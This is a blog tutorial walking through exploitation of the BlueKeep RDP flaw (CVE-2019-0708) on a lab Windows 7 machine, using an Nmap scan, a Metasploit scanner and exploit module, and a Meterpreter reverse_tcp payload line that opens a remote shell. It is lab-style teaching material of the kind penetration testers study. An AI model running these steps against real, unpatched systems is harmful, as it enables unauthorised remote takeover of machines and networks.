Sneaky Bytes

February 23, 2022
Exploitation Techniques

How to Exploit BlueKeep (CVE-2019-0708) on Windows 7

by Sangeeta

What is BlueKeep?

BlueKeep (CVE-2019-0708) is a critical vulnerability in certain Windows operating systems, exposed in 2019. Below is a list of affected 32- bit and 64-bit Windows systems:

  • Windows 7
  • Windows 2000
  • Windows Vista
  • Windows XP
  • Windows Server 2003
  • Windows Server 2003 R2
  • Windows Server 2008
  • Windows Server 2008 R2

This vulnerability can be exploited to allow an attacker to gain access and control of a target system, which will be demonstrated in this post.

BlueKeep exists due a flaw in the Remote Desktop Protocol (RDP) on the systems listed above. The vulnerability does not require any authentication for attackers to execute code at the system level (the highest privilege). If this vulnerability exists on one machine within a network, other systems are also at risk. Since BlueKeep is “wormable”, it can propagate rapidly across networks, much like the WannaCry malware attacks of 2017.

Lab Setup

Any unpatched Windows system listed above with an open RDP port is a potential target for this attack. The Windows 7 machine used as the target in this lab has the following conditions, making it vulnerable:

  1. Unpatched 64-bit Windows 7
  2. RDP enabled
  3. Port 3389 opened

Scanning with Nmap

The image below shows the Nmap scan results for the Windows 7 machine:

Vulnerability Detection with Metasploit

Searching for BlueKeep in the Metasploit Framework reveals both an exploit module and an auxiliary scanner. Since port 3389 (RDP) is open, we’ll first use the auxiliary scanner to check if the system is vulnerable.

Running the RDP scanner provides details like the vulnerability description and the method it uses to check for BlueKeep.

After setting the target host and running the scan, the results confirm that the Windows 7 system is vulnerable.

Exploiting BlueKeep

Selecting the BlueKeep exploit module displays additional information, similar to the RDP scanner module:

The following payload is configured in Metasploit:

set payload windows/x64/meterpreter/reverse_tcp

This exploit is designed for 64-bit Windows systems only.

Important: 32-bit Windows machines and 32-bit Windows Server 2008 are not vulnerable to this particular exploit.

Gaining a Shell

After running the exploit, we successfully obtain a Meterpreter shell on the Windows 7 target machine. From here, we can run system commands such as:

sysinfo
getuid

And with that – we’ve successfully exploited the system!

That wraps up this post. See you in the next one!

Tags:

Sangeeta

MSc, BSc, PNTP, eJPT, CCNA

Leave a Reply

You may also like